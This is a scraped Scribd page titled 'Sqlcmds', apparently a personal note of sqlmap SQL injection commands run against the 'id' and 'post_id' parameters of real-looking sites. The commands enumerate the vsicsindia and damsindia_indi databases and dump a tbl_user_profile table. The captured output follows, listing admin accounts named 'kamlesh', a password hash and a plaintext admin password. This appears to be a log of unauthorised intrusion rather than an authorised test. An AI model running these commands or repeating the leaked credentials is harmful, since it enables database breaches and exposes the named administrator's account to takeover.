Thanks to visit codestin.com
Credit goes to www.scribd.com

0% found this document useful (0 votes)
14 views1 page

Sqlcmds

The document contains a series of SQLMap commands used for database enumeration and extraction of user credentials from a database. It shows commands to retrieve database names, table names, and column details, as well as a dump of admin passwords from the 'tbl_user_profile' table. The output includes specific admin usernames, emails, login statuses, and hashed passwords.

Uploaded by

sumanxlata
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
14 views1 page

Sqlcmds

The document contains a series of SQLMap commands used for database enumeration and extraction of user credentials from a database. It shows commands to retrieve database names, table names, and column details, as well as a dump of admin passwords from the 'tbl_user_profile' table. The output includes specific admin usernames, emails, login statuses, and hashed passwords.

Uploaded by

sumanxlata
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 1

sqlmap -r request -p id

sqlmap -r request -p id -dbs

sqlmap -r request -p id -D vsicsindia --tables

sqlmap -r request -p id -D vsicsindia -T ppreport --columns

sqlmap -r dams -p post_id -D damsindia_indi -T tbl_user_profile --columns --dump

DAMS admin Password


+----+-----------+----------------------+--------------
+----------------------------------+
| id | adminname | admin_email | login_status | adminpassword
|
+----+-----------+----------------------+--------------
+----------------------------------+
| 4 | kamlesh | [email protected] | 1 |
59304b6fe343532441d860c82aa36873 |
| 5 | kamlesh | [email protected] | 1 | Dams@kamlesh123
|
+----+-----------+----------------------+--------------
+----------------------------------+

You might also like